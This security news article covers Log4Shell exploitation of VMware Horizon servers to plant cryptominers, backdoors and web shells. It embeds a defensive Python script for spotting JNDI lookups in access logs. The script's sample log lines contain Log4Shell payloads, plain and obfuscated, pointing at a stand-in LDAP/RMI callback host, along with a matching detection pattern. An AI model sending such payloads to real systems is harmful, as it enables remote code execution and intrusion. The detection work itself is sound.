Log4JShell Used to Swarm VMware Servers with Miners, Backdoors (Security News, March 2022)
What researchers are calling a "horde" of miner bots and backdoors is using the Log4Shell bug to take over vulnerable VMware Horizon servers, and threat actors are still actively waging some of the attacks.
On Tuesday, Sophos reported that the remote code execution Log4j vulnerability in the ubiquitous Java logging library is under active attack, "particularly among cryptocurrency mining bots." Besides cryptominers, attackers are also prying open Log4Shell to deliver backdoors that Sophos believes are the work of initial access brokers, which could lay the groundwork for later ransomware infections.
In late December and January, VMware Horizon servers with Log4Shell vulnerabilities came under Cobalt Strike attack, as flagged by researchers at Huntress.
Those attacks used Log4j's Lightweight Directory Access Protocol (LDAP) resource lookup to retrieve a malicious Java class file that modified existing, legitimate Java code, injecting a web shell into the VM Blast Secure Gateway service and thereby granting attackers remote access and code execution.
The attacks against Horizon servers grew throughout January.
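The LDAP lookup described above is triggered by a Log4j lookup string landing in a logged field (a User-Agent, a request path, a form value). The following detection example is added here and is not code from the article, from Sophos or from Huntress; the access-log lines and the 203.0.113.7 address are constructed (RFC 5737 documentation range). It URL-decodes each line, collapses the common lookup obfuscations (`${lower:j}`, `${upper:J}`, `${::-j}`, `${env:NOPE:-j}`) the way Log4j 2's substitutor would, and then reports any remaining `${jndi:<scheme>://<host>...}` reference together with the callback host, which is what a defender would want to block or hunt for.

```python
"""Spot Log4Shell-style JNDI lookup strings in web access logs.

Added example, not the article's or any vendor's code. Log lines and the
203.0.113.7 address are constructed for illustration.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format). Lines 2-4 carry the
# kind of Log4j lookup string that makes a vulnerable host fetch a class file
# over LDAP/RMI; line 5 merely mentions "jndi" in a harmless query string.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Jan/2022:12:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Jan/2022:12:00:02 +0000] "GET /portal/?q=${jndi:ldap://203.0.113.7:1389/a} HTTP/1.1" 200 512 "-" "curl/7.79"',
    '10.0.0.9 - - [10/Jan/2022:12:00:03 +0000] "GET / HTTP/1.1" 200 12 "-" "${${lower:j}ndi:${lower:l}dap://203.0.113.7:1389/b}"',
    '10.0.0.9 - - [10/Jan/2022:12:00:04 +0000] "GET / HTTP/1.1" 200 12 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.7:1099/c}"',
    '10.0.0.3 - - [10/Jan/2022:12:00:05 +0000] "GET /help?topic=jndi%20naming HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

# An innermost ${...} group: nothing nested inside it.
INNER = re.compile(r"\$\{([^${}]*)\}")

# After normalisation every variant collapses to ${jndi:<scheme>://<host>...}.
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)://([^/:}\s]+)", re.IGNORECASE)


def _resolve(match: re.Match) -> str:
    """Evaluate one innermost lookup for the common obfuscation tricks;
    anything else (including the jndi: lookup itself) is left untouched."""
    expr = match.group(1)
    if ":-" in expr:                      # ${name:-default} with an unknown/empty name
        return expr.split(":-", 1)[1]
    if ":" in expr:
        prefix, value = expr.split(":", 1)
        prefix = prefix.strip().lower()
        if prefix == "lower":
            return value.lower()
        if prefix == "upper":
            return value.upper()
    return match.group(0)


def normalize(text: str) -> str:
    """Undo single/double URL encoding, then collapse nested lookups inside-out."""
    text = unquote(unquote(text))
    for _ in range(32):                   # bounded loop: nesting depth is finite
        resolved = INNER.sub(_resolve, text)
        if resolved == text:
            break
        text = resolved
    return text


def find_jndi_lookups(lines: List[str]) -> List[Dict[str, object]]:
    """Return one record per JNDI lookup found, with the callback scheme and host."""
    hits: List[Dict[str, object]] = []
    for number, raw in enumerate(lines, start=1):
        norm = normalize(raw)
        for m in JNDI.finditer(norm):
            hits.append({"line": number, "scheme": m.group(1).lower(),
                         "host": m.group(2), "payload": m.group(0)})
    return hits


if __name__ == "__main__":
    for hit in find_jndi_lookups(SAMPLE_LOG_LINES):
        print(f"line {hit['line']}: {hit['scheme']} lookup to {hit['host']} ({hit['payload']})")
```

Run against real logs, the `host` field is the useful output: a single callback address repeated across many requests is the indicator to pivot on in egress firewall and DNS logs, since a vulnerable Horizon server would have made an outbound LDAP or RMI connection to it. The normalisation step matters because raw signature matching on the literal string `${jndi:` misses the lower/upper and default-value variants that the constructed lines 3 and 4 show.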
Saryu Nayyar, CEO and founder of Gurucul, told Threatpost that in order to fight the legitimate assessment tools being used to breach organizations, it's also "critical" to employ sophisticated technologies - namely, self-training machine learning and behavioral models - to sniff out exploitation of exposed vulnerabilities, as well as to detect the remote surveillance done by attackers with tools such as Cobalt Strike, et al.
News URL
https://threatpost.com/log4jshell-swarm-vmware-servers-miners-backdoors/179142/
Related news
- Broadcom fixes critical RCE bug in VMware vCenter Server
- VMware patches remote make-me-root holes in vCenter Server, Cloud Foundation
- Critical VMware vCenter Server bugs fixed (CVE-2024-38812)
- Week in review: Critical VMware vCenter Server bugs fixed, Apple releases iOS 18
- Critical Zimbra RCE flaw exploited to backdoor servers using emails
- VMware Releases vCenter Server Update to Fix Critical RCE Vulnerability
- VMware fixes critical vCenter Server RCE bug – again! (CVE-2024-38812)
- VMware fixes bad patch for critical vCenter Server RCE flaw
- Week in review: Fortinet patches critical FortiManager 0-day, VMware fixes vCenter Server RCE